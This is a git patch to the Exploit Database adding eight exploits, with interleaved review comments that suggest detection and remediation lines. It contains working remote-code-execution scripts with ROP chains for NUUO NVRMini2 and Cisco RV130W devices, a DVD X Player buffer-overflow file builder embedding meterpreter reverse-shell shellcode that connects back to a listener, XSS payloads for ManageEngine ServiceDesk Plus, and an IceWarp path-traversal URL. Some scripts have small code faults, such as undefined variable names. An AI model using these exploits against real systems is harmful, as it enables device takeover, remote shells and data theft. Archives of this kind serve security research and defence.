From 76be51b7d6fbd853615edc51d65bfe7ac1589e65 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 5 Jun 2019 05:01:56 +0000
Subject: [PATCH] DB: 2019-06-05

8 changes to exploits/shellcodes
DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)
NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow
Cisco RV130W 1.0.3.44 - Remote Stack Overflow
IceWarp 10.4.4 - Local File Inclusion
Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting
Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting
Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting
Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting
---
 exploits/hardware/remote/46960.py | 89 +++++++++++++++++++++++++++++++
 exploits/hardware/remote/46961.py | 68 +++++++++++++++++++++++
 exploits/java/webapps/46963.txt | 14 +++++
 exploits/java/webapps/46964.txt | 15 ++++++
 exploits/java/webapps/46965.txt | 14 +++++
 exploits/java/webapps/46966.txt | 15 ++++++
 exploits/php/webapps/46959.txt | 15 ++++++
 exploits/windows/local/46962.py | 58 ++++++++++++++++++++
 files_exploits.csv | 8 +++
 9 files changed, 296 insertions(+)
 create mode 100755 exploits/hardware/remote/46960.py
 create mode 100755 exploits/hardware/remote/46961.py
 create mode 100644 exploits/java/webapps/46963.txt
 create mode 100644 exploits/java/webapps/46964.txt
 create mode 100644 exploits/java/webapps/46965.txt
 create mode 100644 exploits/java/webapps/46966.txt
 create mode 100644 exploits/php/webapps/46959.txt
 create mode 100755 exploits/windows/local/46962.py

diff --git a/exploits/hardware/remote/46960.py b/exploits/hardware/remote/46960.py
new file mode 100755
index 000000000..def3ea743
--- /dev/null
+++ b/exploits/hardware/remote/46960.py
@@ -0,0 +1,89 @@ +#!/usr/bin/python +# Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow +# Google Dork: n/a +# Date: Advisory Published: Nov 18 +# Exploit Author: @0x00string +# Vendor Homepage: nuuo.com +# Software Link: https://www.nuuo.com/ProductNode.php?node=2 +# Version: 3.9.1 and prior +# Tested on: 3.9.1 +# CVE : CVE-2018-19864 +# +# [ leading / ] +# [ Padding x 335 ] +# [ original value at stack pointer + 158 ] +# [ padding x 80 ] +# [ address of (pop {r3,lr} ; bx lr) ] +# [ system() address ] +# [ address of (mov r0,sp ; blx r3) ] +# [ command to execute ] + +def banner(): + print ''' + @0x00string + 0000000000000 + 0000000000000000000 00 + 00000000000000000000000000000 + 0000000000000000000000000000000 + 000000000 0000000000 + 00000000 0000000000 + 0000000 000000000000 + 0000000 000000000000000 + 000000 000000000 000000 +0000000 000000000 000000 +000000 000000000 000000 +000000 000000000 000000 +000000 00000000 000000 +000000 000000000 000000 +0000000 000000000 0000000 + 000000 000000000 000000 + 0000000000000000 0000000 + 0000000000000 0000000 + 00000000000 00000000 + 00000000000 000000000 + 0000000000000000000000000000000 + 00000000000000000000000000000 + 000 0000000000000000000 + 0000000000000 +https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py +''' + +def usage (): + print ("python script.py \n" + " -h, --help: Show this message\n" + " -a, --rhost: Target IP address\n" + " -b, --rport: Target Port - default 5150\n" + " -c, --command: Command to execute\n" + "\n" + "Example:\n" + "python script.py -a 10.10.10.10\n" + "python script.py -a 10.10.10.10 -b 1234 -c reboot\n") + exit() + +def main(): + rhost = None; + rport = "5150"; + command = "{/bin/touch,/tmp/hax}" + banner() + options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help']) + for opt, arg in options: + if opt in ('-h', '--help'): + usage() + elif opt in ('-a','--rhost'): + rhost = arg; + elif opt in ('-b','--rport'): + rport 
= arg; + elif opt in ('-c','--command'): + command = arg; + print ("Sending exploit to execute [" + command + "]\n") + buf = "GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" + + "\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " + + "http://" + rhost + ":" + rport + "\r\n\r\n" + sock = socket(AF_INET, SOCK_STREAM) + sock.settimeout(30) + sock.connect((target_ip,int(target_port))) + sock.send(buf) + print ("done\n") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/hardware/remote/46961.py b/exploits/hardware/remote/46961.py new file mode 100755 index 000000000..0297a21ef --- /dev/null +++ b/exploits/hardware/remote/46961.py 
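Review bot: The comment header at the top of 46960.py lays out the overflow but names no fixed release and no indicator a defender could alert on. The request built in `main()` is a GET whose path is more than 400 bytes of filler followed by non-ASCII bytes, sent to port 5150 by default, and the default command leaves `/tmp/hax` on the device; both are usable indicators. I would add comment lines such as `# Affected: 3.9.1 and prior; apply the vendor firmware that addresses CVE-2018-19864 (version not stated here)` and `# Detection: GET path of several hundred bytes with non-ASCII content on the NVR HTTP port; /tmp/hax present after the default PoC command`.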
@@ -0,0 +1,68 @@ +#!/usr/bin/python +# Exploit Title: Cisco RV130W Remote Stack Overflow +# Google Dork: n/a +# Date: Advisory Published: Feb 2019 +# Exploit Author: @0x00string +# Vendor Homepage: cisco.com +# Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html +# Version: 1.0.3.44 and prior +# Tested on: 1.0.3.44 +# CVE : CVE-2019-1663 +# +# 0x357fc000 - libc base addr +# 0x35849144 - system() addr +# +# 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr; +# 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc}; +# 0x00041308 / 0x3583D308: mov r0, sp; blx r2; +# +# gadget 1 system() junk gadget 2 junk junk junk junk junk gadget 3 text +# [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command] +# +# curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi' + +#!/usr/bin/python +import requests + +def banner(): + print ''' + @0x00string + 0000000000000 + 0000000000000000000 00 + 00000000000000000000000000000 + 0000000000000000000000000000000 + 000000000 0000000000 + 00000000 0000000000 + 0000000 000000000000 + 0000000 000000000000000 + 000000 000000000 000000 +0000000 000000000 000000 +000000 000000000 000000 +000000 000000000 000000 +000000 00000000 
000000 +000000 000000000 000000 +0000000 000000000 0000000 + 000000 000000000 000000 + 0000000000000000 0000000 + 0000000000000 0000000 + 00000000000 00000000 + 00000000000 000000000 + 0000000000000000000000000000000 + 00000000000000000000000000000 + 000 0000000000000000000 + 0000000000000 +https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py +''' + +def main(): + banner() + command = "ping 192.168.1.100\x00" + print ("Sending exploit to execute [" + command + "]\n") + rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35" + payload = ("Z" * 446) + rop + command + url = "https://192.168.1.100:443/login.cgi" + data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'} + r = requests.post(url, payload=data) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/java/webapps/46963.txt b/exploits/java/webapps/46963.txt new file mode 100644 index 000000000..4e91540d1 --- /dev/null +++ b/exploits/java/webapps/46963.txt @@ -0,0 +1,14 @@ +# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do +# Date: 2019-06-04 +# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup) +# Vendor Homepage: https://www.manageengine.com/products/service-desk +# Version: Zoho ManageEngine ServiceDesk Plus 9.3 +# CVE : CVE-2019-12538 + + +Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do qc_siteID parameter + + +Attack vector: domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/>&userConfigID=21111111&SELECTEDSITEID=1&SELECTEDSITENAME= + +PoC: https://drive.google.com/file/d/1Oo_lC_XCtAiF2Gvx_ZoS8Yqwunc1U_57/view \ No newline at end of file 
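Review bot: The comment header of 46961.py lists gadget addresses and a curl line but no remediation or detection guidance for CVE-2019-1663. What `main()` posts to `/login.cgi` is a `pwd` field of 446 filler bytes followed by non-printable bytes, far longer than anything the login form would legitimately carry, so a length or character-set check on `pwd` at a proxy or IDS catches it. I would add comment lines such as `# Affected: 1.0.3.44 and prior; upgrade to a later firmware release (fixed version not stated here)` and `# Detection: POST /login.cgi with pwd of several hundred bytes or containing non-printable bytes`, plus a line saying the management interface should not be reachable from untrusted networks. The file also carries `#!/usr/bin/python` twice; only the one on the first line has any effect, so the second can go.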
diff --git a/exploits/java/webapps/46964.txt b/exploits/java/webapps/46964.txt
new file mode 100644
index 000000000..b26cefbdb
--- /dev/null
+++ b/exploits/java/webapps/46964.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SolutionSearch.do
+# Date: 2019-06-04
+# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
+# Vendor Homepage: https://www.manageengine.com/products/service-desk
+# Version: Zoho ManageEngine ServiceDesk Plus 9.3
+# CVE : CVE-2019-12541
+
+
+Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SolutionSearch.do searchText parameter.
+
+
+Attack vector: domain/SolutionSearch.do?searchText=1'%3balert('XSS')%2f%2f706z8rz68&selectName=Solutions
+
+
+PoC: https://drive.google.com/file/d/1zXyFpVwAPc0MfcERNmvIdyKLzx0JMA9r/view
\ No newline at end of file
diff --git a/exploits/java/webapps/46965.txt b/exploits/java/webapps/46965.txt
new file mode 100644
index 000000000..48bc3279a
--- /dev/null
+++ b/exploits/java/webapps/46965.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do
+# Date: 2019-06-04
+# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
+# Vendor Homepage: https://www.manageengine.com/products/service-desk
+# Version: Zoho ManageEngine ServiceDesk Plus 9.3
+# CVE : CVE-2019-12542
+
+
+An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do userConfigID parameter.
+
+
+Attack vector: domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=21111111ucgol">qzmm3u7id8z&selectName=Site
+
+PoC: https://drive.google.com/file/d/1aJN6GudSd7WWckXWxA5nelM48Xib9eS9/view
\ No newline at end of file
diff --git a/exploits/java/webapps/46966.txt b/exploits/java/webapps/46966.txt
new file mode 100644
index 000000000..1f2c33ff1
--- /dev/null
+++ b/exploits/java/webapps/46966.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via PurchaseRequest.do
+# Date: 2019-06-04
+# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
+# Vendor Homepage: https://www.manageengine.com/products/service-desk
+# Version: Zoho ManageEngine ServiceDesk Plus 9.3
+# CVE : CVE-2019-12543
+
+
+Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter.
+
+
+Attack vector: domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=g24aj%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3Eqdaxl
+
+
+PoC: https://drive.google.com/file/d/1pHeq446oNonw5ZJ53idKhP8gC-9CZtQW/view
\ No newline at end of file
diff --git a/exploits/php/webapps/46959.txt b/exploits/php/webapps/46959.txt
new file mode 100644
index 000000000..8c2acb382
--- /dev/null
+++ b/exploits/php/webapps/46959.txt
@@ -0,0 +1,15 @@
+# Exploit Title: IceWarp <=10.4.4 local file include
+# Date: 02/06/2019
+# Exploit Author: JameelNabbo
+# Website: uitsec.com
+# Vendor Homepage: http://www.icewarp.com
+# Software Link: https://www.icewarp.com/downloads/trial/
+# Version: 10.4.4
+# Tested on: Windows 10
+# CVE: CVE-2019-12593
+POC:
+
+http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]
+
+Example:
+http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
\ No newline at end of file
diff --git a/exploits/windows/local/46962.py b/exploits/windows/local/46962.py
new file mode 100755
index 000000000..864be5c18
--- /dev/null
+++ b/exploits/windows/local/46962.py
@@ -0,0 +1,58 @@ +# Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH +# Date: 6-3-2019 +# Exploit Author: Kevin Randall +# Vendor Homepage: http://www.dvd-x-player.com/download.html#dvdPlayer +# Software Link: http://www.dvd-x-player.com/download.html#dvdPlayer +# Version: 5.5 Pro +# Tested on: Windows 7 +# CVE : N/A + +#!/usr/bin/python +###########Create Shellcode with MSFVenom############################################################################################### +##msfvenom shellcode generate: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.9 LPORT=4444 -b '\x00\x0A\x0D\x1A' -f python +######################################################################################################################################## +file_name = "payloadofficial.plf" + +#######################Copy and Paste Shellcode Here!!########################### +buf = "" +buf += "\xd9\xe8\xb8\xa0\x7e\x18\xef\xd9\x74\x24\xf4\x5f\x2b" +buf += "\xc9\xb1\x56\x31\x47\x18\x83\xef\xfc\x03\x47\xb4\x9c" +buf += "\xed\x13\x5c\xe2\x0e\xec\x9c\x83\x87\x09\xad\x83\xfc" +buf += "\x5a\x9d\x33\x76\x0e\x11\xbf\xda\xbb\xa2\xcd\xf2\xcc" +buf += "\x03\x7b\x25\xe2\x94\xd0\x15\x65\x16\x2b\x4a\x45\x27" +buf += "\xe4\x9f\x84\x60\x19\x6d\xd4\x39\x55\xc0\xc9\x4e\x23" +buf += "\xd9\x62\x1c\xa5\x59\x96\xd4\xc4\x48\x09\x6f\x9f\x4a" +buf += "\xab\xbc\xab\xc2\xb3\xa1\x96\x9d\x48\x11\x6c\x1c\x99" +buf += "\x68\x8d\xb3\xe4\x45\x7c\xcd\x21\x61\x9f\xb8\x5b\x92" +buf += "\x22\xbb\x9f\xe9\xf8\x4e\x04\x49\x8a\xe9\xe0\x68\x5f" +buf += "\x6f\x62\x66\x14\xfb\x2c\x6a\xab\x28\x47\x96\x20\xcf" +buf += "\x88\x1f\x72\xf4\x0c\x44\x20\x95\x15\x20\x87\xaa\x46" +buf += "\x8b\x78\x0f\x0c\x21\x6c\x22\x4f\x2d\x41\x0f\x70\xad" +buf += "\xcd\x18\x03\x9f\x52\xb3\x8b\x93\x1b\x1d\x4b\xa2\x0c" +buf += "\x9e\x83\x0c\x5c\x60\x24\x6c\x74\xa7\x70\x3c\xee\x0e" +buf += "\xf9\xd7\xee\xaf\x2c\x4d\xe5\x27\x0f\x39\xf9\xbe\xe7" +buf += "\x3b\xfa\xd1\xab\xb2\x1c\x81\x03\x94\xb0\x62\xf4\x54" +buf += 
"\x61\x0b\x1e\x5b\x5e\x2b\x21\xb6\xf7\xc6\xce\x6e\xaf" +buf += "\x7e\x76\x2b\x3b\x1e\x77\xe6\x41\x20\xf3\x02\xb5\xef" +buf += "\xf4\x67\xa5\x18\x63\x87\x35\xd9\x06\x87\x5f\xdd\x80" +buf += "\xd0\xf7\xdf\xf5\x16\x58\x1f\xd0\x25\x9f\xdf\xa5\x1f" +buf += "\xeb\xd6\x33\x1f\x83\x16\xd4\x9f\x53\x41\xbe\x9f\x3b" +buf += "\x35\x9a\xcc\x5e\x3a\x37\x61\xf3\xaf\xb8\xd3\xa7\x78" +buf += "\xd1\xd9\x9e\x4f\x7e\x22\xf5\xd3\x79\xdc\x8b\xfb\x21" +buf += "\xb4\x73\xbc\xd1\x44\x1e\x3c\x82\x2c\xd5\x13\x2d\x9c" +buf += "\x16\xbe\x66\xb4\x9d\x2f\xc4\x25\xa1\x65\x88\xfb\xa2" +buf += "\x8a\x11\x0c\xd8\xe3\xa6\xed\x1d\xea\xc2\xee\x1d\x12" +buf += "\xf5\xd3\xcb\x2b\x83\x12\xc8\x0f\x9c\x21\x6d\x39\x37" +buf += "\x49\x21\x39\x12" +################################################################################# + +#No Operations# +nops = "\x90"*20 +shellcode = nops + buf + +####Where all the magic happens! :)##################################################################### +buffer = "A"* 608 + "\xEB\x06\x90\x90" + "\x2E\x17\x64\x61" + shellcode + "D"*(1384-len(shellcode)) +################################################################################################### +plf_file = open(file_name,"w") +plf_file.write(buffer) +plf_file.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 03a8e77fe..651a09ebe 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
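Review bot: The `buf` byte string in 46962.py is opaque, and the only description of it is the msfvenom comment above it, so a reader of the archive cannot confirm from the entry what the embedded payload does or where it connects. The header should say so in words and add a line for defenders, e.g. `# Payload: opaque blob, described only by the msfvenom line above; not verifiable from this file` and `# Mitigation: no CVE or vendor fix is referenced; do not open .plf playlists from untrusted sources in DVD X Player 5.5 Pro`. The file it writes is always a single 2000-byte line (608 + 8 + 1384 bytes) with a `.plf` extension, which is a usable file-scanning indicator. The `#!/usr/bin/python` line sits below the header comments, where it is only a comment.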
@@ -10537,6 +10537,7 @@ id,file,description,date,author,type,platform,port
 46933,exploits/android/local/46933.txt,"EquityPandit 1.0 - Password Disclosure",2019-05-28,ManhNho,local,android,
 46938,exploits/windows/local/46938.txt,"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2)",2019-05-23,SandboxEscaper,local,windows,
 46945,exploits/windows/local/46945.cpp,"Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)",2014-11-24,anonymous,local,windows,
+46962,exploits/windows/local/46962.py,"DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)",2019-06-04,"Kevin Randall",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17477,6 +17478,8 @@ id,file,description,date,author,type,platform,port
 46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,
 46934,exploits/windows/remote/46934.txt,"Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass",2019-05-28,"Faudhzan Rahman",remote,windows,
 46942,exploits/java/remote/46942.rb,"Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)",2019-05-29,Metasploit,remote,java,
+46960,exploits/hardware/remote/46960.py,"NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow",2019-06-04,@0x00string,remote,hardware,
+46961,exploits/hardware/remote/46961.py,"Cisco RV130W 1.0.3.44 - Remote Stack Overflow",2019-06-04,@0x00string,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41367,3 +41370,8 @@ id,file,description,date,author,type,platform,port
 46956,exploits/php/webapps/46956.txt,"KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities",2019-06-03,SlidingWindow,webapps,php,
 46957,exploits/hardware/webapps/46957.txt,"AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control",2019-06-03,Luca.Chiou,webapps,hardware,
 46958,exploits/php/webapps/46958.txt,"WordPress Plugin Form Maker 1.13.3 - SQL Injection",2019-06-03,"Daniele Scanu",webapps,php,
+46959,exploits/php/webapps/46959.txt,"IceWarp 10.4.4 - Local File Inclusion",2019-06-04,JameelNabbo,webapps,php,
+46963,exploits/java/webapps/46963.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
+46964,exploits/java/webapps/46964.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
+46965,exploits/java/webapps/46965.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
+46966,exploits/java/webapps/46966.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java,
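Review bot: The four ServiceDesk Plus rows (46963 to 46966) give the author as `Vingroup`, while the exploit files added in this same commit credit `Tarantula Team - VinCSS (a member of Vingroup)`. The index is what search tooling reads, so the author column should match the file headers, e.g. `"Tarantula Team - VinCSS"`. Row 46959 also says 2019-06-04 where its file header says 02/06/2019; that may simply be publication versus submission date, but it is worth confirming which one the date column is meant to hold.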